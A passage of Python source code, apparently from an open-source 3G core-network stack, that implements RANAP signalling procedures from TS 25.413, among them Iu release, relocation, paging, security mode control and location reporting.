self._gtp_rem_mobile_nsapi = self._gtp_add_mobile_nsapi\n self._disable_gtpu()\n\n\nclass RANAPRABReleaseRequest(RANAPSigProc):\n \"\"\"RAB Release Request: TS 25.413, section 8.3\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 41: RAB_ReleaseList (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.rAB_ReleaseRequest\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPIuReleaseRequest(RANAPSigProc):\n \"\"\"Iu Release Request: TS 25.413, section 8.4\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.iu_ReleaseRequest\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def recv(self, pdu):\n self._recv(pdu)\n \n def trigger(self):\n # copy the cause signaled by the RNC\n Proc = self.Iu.init_ranap_proc(RANAPIuRelease, Cause=self.UEInfo['Cause'])\n if Proc:\n return [Proc]\n else:\n return []\n\n\nclass RANAPIuRelease(RANAPSigProc):\n \"\"\"Iu Release: TS 25.413, section 8.5\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n Extensions:\n - 252: End_Of_CSFB (O)\n - 254: Out_Of_UTRAN (O)\n - 277: PLMNidentity (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 31: RAB_DataVolumeReportList (O)\n - 44: RAB_ReleasedList_IuRelComp (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.iu_Release\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n send = RANAPSigProc._send\n \n def _release_iu(self):\n # update mobility state\n if self.Iu.DOM == 'CS':\n if self.Iu.MM.state != 'INACTIVE':\n self.Iu.MM.state = 'IDLE'\n else:\n # suspend all RAB\n self.Iu.SM.pdp_suspend()\n if self.Iu.GMM.state != 'INACTIVE':\n self.Iu.GMM.state = 'IDLE'\n self._log('INF', 'UE disconnected, cause %r' % (self._NetInfo['Cause'], ))\n #\n # disconnect the Iu interface to the RNC for the UE\n self.Iu.unset_ran()\n self.Iu.unset_ctx()\n \n def recv(self, pdu):\n # recv the IuRelease response\n self._recv(pdu)\n # remove from the Iu RANAP procedure stack\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n self._release_iu()\n \n def abort(self):\n # remove from the Iu RANAP procedure stack\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n self._log('INF', 'aborting')\n self._release_iu()\n\n\nclass RANAPRelocationPreparation(RANAPSigProc):\n \"\"\"Relocation Preparation: TS 25.413, section 8.6\n \n RNC-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n - 7: ClassmarkInformation2 (C)\n - 8: ClassmarkInformation3 (C)\n - 20: OldBSS_ToNewBSS_Information (O)\n - 56: RelocationType (M)\n - 60: SourceID (M)\n - 61: Source_ToTarget_TransparentContainer (C)\n - 62: TargetID (M)\n Extensions:\n - 108: GERAN_Classmark (O)\n - 161: SourceBSS_ToTargetBSS_TransparentContainer (O)\n - 203: CSG_Id (O)\n - 226: SRVCC_HO_Indication (O)\n - 235: Cell_Access_Mode (O)\n - 259: RSRVCC_HO_Indication (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 14: L3_Information (O)\n - 28: RAB_DataForwardingList (O)\n - 46: RAB_RelocationReleaseList (O)\n - 63: Target_ToSource_TransparentContainer (O)\n Extensions:\n - 99: InterSystemInformation_TransparentContainer (O)\n - 162: TargetBSS_ToSourceBSS_TransparentContainer (O)\n - 227: SRVCC_Information (O)\n - 260: RSRVCC_Information (O)\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n - 99: InterSystemInformation_TransparentContainer (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.relocationPreparation\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPRelocationResourceAllocation(RANAPSigProc):\n \"\"\"Relocation Resource Allocation: TS 25.413, section 8.7\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 11: EncryptionInformation (O)\n - 12: IntegrityProtectionInformation (O)\n - 23: PermanentNAS_UE_ID (O)\n - 49: RAB_SetupList_RelocReq (O)\n - 61: SourceRNC_ToTargetRNC_TransparentContainer (M)\n - 79: IuSignallingConnectionIdentifier (M)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 105: SNA_Access_Information (O)\n - 118: UESBI_Iu (O)\n - 127: PLMNidentity (O)\n - 133: CNMBMSLinkingInformation (O)\n - 203: CSG_Id (O)\n - 233: UE_AggregateMaximumBitRate (O)\n - 234: CSG_Membership_Status (O)\n - 239: MSISDN (O)\n - 261: PLMNidentity (O)\n - 289: PowerSavingIndicator (O)\n SuccessfulOutcome:\n IEs:\n - 5: ChosenEncryptionAlgorithm (O)\n - 6: ChosenIntegrityProtectionAlgorithm (O)\n - 9: CriticalityDiagnostics (O)\n - 35: RAB_FailedList (O)\n - 50: RAB_SetupList_RelocReqAck (O)\n - 63: TargetRNC_ToSourceRNC_TransparentContainer (O)\n Extensions:\n - 100: NewBSS_To_OldBSS_Information (O)\n - 203: CSG_Id (O)\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n - 100: NewBSS_To_OldBSS_Information (O)\n - 108: GERAN_Classmark (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.relocationResourceAllocation\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPRelocationDetect(RANAPSigProc):\n \"\"\"Relocation Detect: TS 25.413, section 8.8\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n None\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.relocationDetect\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPRelocationComplete(RANAPSigProc):\n \"\"\"Relocation Complete: TS 25.413, section 8.9\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n None\n Extensions:\n - 250: HigherBitratesThan16MbpsFlag (O)\n - 262: TunnelInformation (O)\n - 275: LHN_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.relocationComplete\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPRelocationCancel(RANAPSigProc):\n \"\"\"Relocation Cancel: TS 25.413, section 8.10\n \n RNC-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.relocationCancel\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPSRNSContextTransfer(RANAPSigProc):\n \"\"\"SRNS Context Transfer: TS 25.413, section 8.11\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 29: RAB_DataForwardingList_SRNS_CtxReq (M)\n Extensions:\n - 167: RAT_Type (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 25: RAB_ContextList (O)\n - 85: RAB_ContextFailedtoTransferList (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.sRNS_ContextTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n send = RANAPSigProc._send\n \n def recv(self, pdu):\n # recv the SRNSContextTransfer response\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n if not self.errcause:\n # TODO: do something with the list of RAB contexts\n self._log('INF', 'success')\n\n\nclass RANAPSRNSDataForwarding(RANAPSigProc):\n \"\"\"SRNS Data Forwarding: TS 25.413, section 8.12\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 28: RAB_DataForwardingList (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.sRNS_DataForward\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPSRNSContextForwardToCN(RANAPSigProc):\n \"\"\"SRNS Context Forwarding from Source RNC to CN: TS 25.413, section 8.13\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 25: RAB_ContextList (M)\n Extensions:\n - 103: RRC_Container (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.forwardSRNS_Context\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPSRNSContextForwardToRNC(RANAPSigProc):\n \"\"\"SRNS Context Forwarding from CN to target RNC: TS 25.413, section 8.14\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 25: RAB_ContextList (M)\n Extensions:\n - 103: RRC_Container (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.forwardSRNS_Context\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPPaging(RANAPConlessSigProc):\n \"\"\"Paging: TS 25.413, section 8.15\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 17: NonSearchingIndication (O)\n - 21: PagingAreaID (O)\n - 22: PagingCause (O)\n - 23: PermanentNAS_UE_ID (M)\n - 64: TemporaryUE_ID (O)\n - 76: DRX_CycleLengthCoefficient (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 229: CSG_Id_List (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.paging\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n send = RANAPConlessSigProc._send\n\n\nclass RANAPCommonID(RANAPSigProc):\n \"\"\"Common ID: TS 25.413, section 8.16\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 23: PermanentNAS_UE_ID (M)\n Extensions:\n - 105: SNA_Access_Information (O)\n - 118: UESBI_Iu (O)\n - 127: PLMNidentity (O)\n - 202: SubscriberProfileIDforRFP (O)\n - 228: SRVCC_Operation_Possible (O)\n - 234: CSG_Membership_Status (O)\n - 249: Management_Based_MDT_Allowed (O)\n - 263: MDT_PLMN_List (O)\n - 272: RSRVCC_Operation_Possible (O)\n - 277: PLMNidentity (O)\n - 289: PowerSavingIndicator (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.commonID\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def send(self):\n self._log('INF', 'sent')\n return self._send()\n\n\nclass RANAPCNInvokeTrace(RANAPSigProc):\n \"\"\"CN Invoke Trace: TS 25.413, section 8.17\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 19: OMC_ID (O)\n - 65: TraceReference (M)\n - 66: TraceType (O)\n - 68: TriggerID (O)\n - 69: UE_ID (O)\n Extensions:\n - 125: TracePropagationParameters (O)\n - 244: MDT_Configuration (O)\n - 251: TransportLayerAddress (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.cN_InvokeTrace\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def send(self):\n try:\n tracerefl = '0x%s' % hexlify(self.TraceReference).decode('ascii')\n except Exception:\n tracerefl = repr(self.TraceReference)\n self._log('INF', 'sent with trace reference %s' % tracerefl)\n return self._send()\n\n\nclass RANAPSecurityModeControl(RANAPSigProc):\n \"\"\"Security Mode Control: TS 25.413, section 8.18\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 11: EncryptionInformation (O)\n - 12: IntegrityProtectionInformation (M)\n - 75: KeyStatus (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 5: ChosenEncryptionAlgorithm (O)\n - 6: ChosenIntegrityProtectionAlgorithm (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.securityModeControl\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n send = RANAPSigProc._send\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n #\n if self.errcause:\n self._log('WNG', 'error in the response decoding')\n self.success = False\n self.Iu.SEC['CKSN'] = None\n elif pdu[0] == 'unsuccessfulOutcome':\n try:\n self._log('WNG', 'failure, rejected with cause %r' % (self.UEInfo['Cause'], ))\n except Exception:\n self._log('WNG', 'failure, rejected without cause')\n self.success = False\n self.Iu.reset_sec_ctx()\n else:\n self.success, self._ret = True, []\n # update the Iu security context with selected algorithms\n secctx = self.Iu.SEC[self.Iu.SEC['CKSN']]\n try:\n secctx['UEA'] = self.UEInfo['ChosenEncryptionAlgorithm']\n uea = secctx['UEA']\n except Exception:\n secctx['UEA'] = None\n uea = 0\n try:\n secctx['UIA'] = self.UEInfo['ChosenIntegrityProtectionAlgorithm']\n uia = 1 + secctx['UIA'] # UIA1 -> uia = 1, UIA2 -> uia = 2\n except Exception:\n secctx['UIA'] = None\n uia = 0\n self._log('INF', 'accepted with UEA%i / UIA%i' % (uea, uia))\n #\n # signal the result back to the NAS stack if required\n if self._cb:\n self._ret = self.Iu.trigger_nas(self)\n self._cb = None\n \n def trigger(self):\n if not self.success:\n # copy the cause signaled by the RNC\n Proc = self.Iu.init_ranap_proc(RANAPIuRelease, Cause=self.UEInfo['Cause'])\n if Proc:\n return [Proc]\n else:\n return []\n else:\n # new RANAP procedures may have been prepared by the NAS layer\n return self._ret\n\n\nclass RANAPLocationReportingControl(RANAPSigProc):\n \"\"\"Location Reporting Control: TS 25.413, section 8.19\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 57: RequestType (M)\n Extensions:\n - 111: VerticalAccuracyCode (O)\n - 112: ResponseTime (O)\n - 113: PositioningPriority (O)\n - 114: ClientType (O)\n - 164: IncludeVelocity (O)\n - 168: PeriodicLocationInfo (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.locationReportingControl\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def send(self):\n self._log('INF', 'sent with request type %r' % self.RequestType)\n return self._send()\n\n\nclass RANAPLocationReport(RANAPSigProc):\n \"\"\"Location Report: TS 25.413, section 8.20\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 0: AreaIdentity (O)\n - 4: Cause (O)\n - 57: RequestType (O)\n Extensions:\n - 97: LastKnownServiceArea (O)\n - 119: PositionData (O)\n - 120: PositionDataSpecificToGERANIuMode (O)\n - 122: AccuracyFulfilmentIndicator (O)\n - 165: VelocityEstimate (O)\n - 283: BarometricPressure (O)\n - 285: CivicAddress (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.locationReport\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n _PosDataDiscLUT = {\n 0 : 'Positioning Data Set present (non-GANSS methods used)',\n 1 : 'GANSS Positioning Data Set present (GANSS methods used)',\n 2 : 'Additional Positioning Data Set'\n }\n _PosMethLUT = {\n 5 : 'Mobile Assisted GPS',\n 6 : 'Mobile Based GPS',\n 7 : 'Conventional GPS',\n 8 : 'U-TDOA',\n 9 : 'OTDOA',\n 10 : 'IPDL',\n 11 : 'RTT',\n 12 : 'Cell ID'\n }\n _UsageLUT = {\n 0 : 'Attempted unsuccessfully due to failure or interruption - not used',\n 1 : 'Attempted successfully: results not used to generate location - not used',\n 2 : 'Attempted successfully: results used to verify but not generate location - not used',\n 3 : 'Attempted successfully: results used to generate location',\n 4 : 'Attempted successfully: case where MS supports multiple mobile based positioning methods '\\\n 'and the actual method or methods used by the MS cannot be determined'\n }\n _GANSSPosMethLUT = {\n 0 : 'MS-Based',\n 1 : 'MS-Assisted',\n 2 : 'Conventional'\n }\n _GANSSID = {\n 0 : 'Galileo',\n 1 : 'SBAS',\n 2 : 'Modernized GPS',\n 3 : 'QZSS',\n 4 : 'GLONASS',\n 5 : 'BDS '\n }\n _AddPosMethLUT = {\n 1 : 'MS-Assisted',\n 2 : 'Standalone'\n }\n _AddID = {\n 0 : 'Barometric Pressure',\n 1 : 'WLAN',\n 3 : 'Bluetooth',\n 4 : 'MBS'\n }\n \n def recv(self, pdu):\n # recv the data volume report response\n self._recv(pdu)\n if not self.errcause:\n desc, ueinfo = [], dict(self.UEInfo)\n if 'RequestType' in ueinfo:\n del ueinfo['RequestType']\n if 'AreaIdentity' in ueinfo and ueinfo['AreaIdentity'][0] == 'sAI':\n desc.append('SAI PLMN %s, LAC 0x%.4x, SAC 0x%.4x'\\\n % (plmn_buf_to_str(ueinfo['AreaIdentity'][1]['pLMNidentity']),\n unpack('>H', ueinfo['AreaIdentity'][1]['lAC'])[0],\n unpack('>H', ueinfo['AreaIdentity'][1]['sAC'])[0]))\n del ueinfo['AreaIdentity']\n if 'PositionData' in ueinfo:\n try:\n desc.extend( self._get_position_data(ueinfo['PositionData']) )\n except Exception:\n pass\n else:\n del ueinfo['PositionData']\n if ueinfo:\n # some more unprocessed values\n desc.extend(['%s, %r' % (k, v) for (k, v) in ueinfo.items()])\n self._log('INF', ' | '.join(desc))\n \n @classmethod\n def _get_position_data(cls, data):\n disc, ds, desc = data['positioningDataDiscriminator'][0], data['positioningDataSet'], []\n if disc == 0:\n pmu = ord(ds[0])\n pm, pu = pmu>>3, pmu&0x7\n desc.append('positioning method %i (%s) and usage %i (%s)'\\\n % (pm, cls._PosMethLUT[pm], pu, cls._UsageLUT[pu]))\n if len(ds) > 1:\n pmu = ord(ds[1])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('GANSS positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._GANSSPosMethLUT[pm], pid, cls._GANSSID[pid], pu, cls._UsageLUT[pu]))\n if len(ds) > 2:\n pmu = ord(ds[2])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('additional positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._AddPosMethLUT[pm], pid, cls._AddID[pid], pu, cls._UsageLUT[pu]))\n #\n elif disc == 1:\n pmu = ord(ds[1])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('GANSS positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._GANSSPosMethLUT[pm], pid, cls._GANSSID[pid], pu, cls._UsageLUT[pu]))\n if len(ds) > 2:\n pmu = ord(ds[2])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('additional positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._AddPosMethLUT[pm], pid, cls._AddID[pid], pu, cls._UsageLUT[pu]))\n #\n elif disc == 2:\n pmu = ord(ds[2])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('additional positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._AddPosMethLUT[pm], pid, cls._AddID[pid], pu, cls._UsageLUT[pu]))\n #\n return desc\n\n\nclass RANAPDataVolumeReport(RANAPSigProc):\n \"\"\"Data Volume Report: TS 25.413, section 8.21\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 33: RAB_DataVolumeReportRequestList (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 31: RAB_DataVolumeReportList (O)\n - 72: RAB_FailedtoReportList (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.dataVolumeReport\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n send = RANAPSigProc._send\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n if not self.errcause:\n # TODO: do something with the data volume report\n self._log('INF', 'success')\n\n\nclass RANAPInitialUEMessage(RANAPSigProc):\n \"\"\"Initial UE Message: TS 25.413, section 8.22\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 15: LAI (M)\n - 16: NAS_PDU (M)\n - 55: RAC (C)\n - 58: SAI (M)\n - 79: IuSignallingConnectionIdentifier (M)\n - 86: GlobalRNC_ID (M)\n Extensions:\n - 23: PermanentNAS_UE_ID (O)\n - 108: GERAN_Classmark (O)\n - 127: PLMNidentity (O)\n - 130: NAS_SequenceNumber (O)\n - 166: RedirectAttemptFlag (O)\n - 171: ExtendedRNC_ID (O)\n - 203: CSG_Id (O)\n - 235: Cell_Access_Mode (O)\n - 241: TransportLayerAddress (O)\n - 250: HigherBitratesThan16MbpsFlag (O)\n - 262: TunnelInformation (O)\n - 273: TransportLayerAddress (O)\n - 275: LHN_ID (O)\n - 286: SGSN_Group_Identity (O)\n - 290: UE_Usage_Type (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.initialUE_Message\n \n # Custom decoders\n Decod = {\n 'ini': ({\n 'LAI' : lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n bytes_to_uint(x['lAC'], 16)),\n 'RAC' : lambda x: bytes_to_uint(x, 8),\n 'SAI' : lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n bytes_to_uint(x['lAC'], 16),\n bytes_to_uint(x['sAC'], 16)),\n 'IuSignallingConnectionIdentifier': lambda x: x[0],\n 'GlobalRNC_ID': lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n x['rNC-ID'])},\n {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def recv(self, pdu):\n self._recv(pdu)\n if not self.errcause:\n # verification against HNBd parameters and HNBAP / RUA infos:\n err, plmn = False, self.RNC.Config['PLMNidentity']\n if self.UEInfo['CN_DomainIndicator'][:2].upper() != self.Iu.DOM:\n self._log('WNG', 'invalid CN Domain Indicator, %s' % self.UEInfo['CN_DomainIndicator'][:2])\n err = True\n if self.UEInfo['LAI'] != (plmn, self.RNC.Config['LAC']):\n self._log('WNG', 'invalid LAI, %s.%.4x' % self.UEInfo['LAC'])\n err = True\n if 'RAC' in self.UEInfo and self.UEInfo['RAC'] != self.RNC.Config['RAC']:\n self._log('WNG', 'invalid RAC, %.2x' % self.UEInfo['RAC'])\n err = True\n if self.UEInfo['SAI'][2] != self.RNC.Config['SAC']:\n self._log('WNG', 'invalid SAC, %.2x' % self.UEInfo['SAI'][2])\n err = True\n if self.UEInfo['GlobalRNC_ID'] != (plmn, self.RNC.RNC_ID):\n self._log('WNG', 'invalid GlobalRNC-ID, %s' % self.UEInfo['GlobalRNC_ID'])\n err = True\n if err:\n # error cause: protocol, message-not-compatible-with-receiver-state\n self.errcause = ('Protocol', 99)\n #\n if not self.errcause:\n # update mobility state\n if self.Iu.DOM == 'CS':\n self.Iu.MM.state = 'ACTIVE'\n else:\n self.Iu.GMM.state = 'ACTIVE'\n # update UE location\n self.UE.set_lai(*self.UEInfo['LAI'])\n if 'RAC' in self.UEInfo:\n self.UE.set_rac(self.UEInfo['RAC'])\n # process the NAS PDU, and get a list (potentially empty) of new\n # RANAP procedures to be run\n self._ret = self.Iu.process_nas(self.UEInfo['NAS_PDU'])\n \n def trigger(self):\n return self._ret\n\n\nclass RANAPDirectTransferCN(RANAPSigProc):\n \"\"\"Direct Transfer: TS 25.413, section 8.23\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 15: LAI (O)\n - 16: NAS_PDU (M)\n - 55: RAC (O)\n - 58: SAI (O)\n - 59: SAPI (O)\n Extensions:\n - 128: RedirectionCompleted (O)\n - 129: RedirectionIndication (O)\n - 202: SubscriberProfileIDforRFP (O)\n - 241: TransportLayerAddress (O)\n - 273: TransportLayerAddress (O)\n - 275: LHN_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.directTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n send = RANAPSigProc._send\n\n\nclass RANAPDirectTransferRNC(RANAPSigProc):\n \"\"\"Direct Transfer: TS 25.413, section 8.23\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 15: LAI (O)\n - 16: NAS_PDU (M)\n - 55: RAC (O)\n - 58: SAI (O)\n - 59: SAPI (O)\n Extensions:\n - 128: RedirectionCompleted (O)\n - 129: RedirectionIndication (O)\n - 202: SubscriberProfileIDforRFP (O)\n - 241: TransportLayerAddress (O)\n - 273: TransportLayerAddress (O)\n - 275: LHN_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.directTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({\n 'LAI' : lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n bytes_to_uint(x['lAC'], 16)),\n 'RAC' : 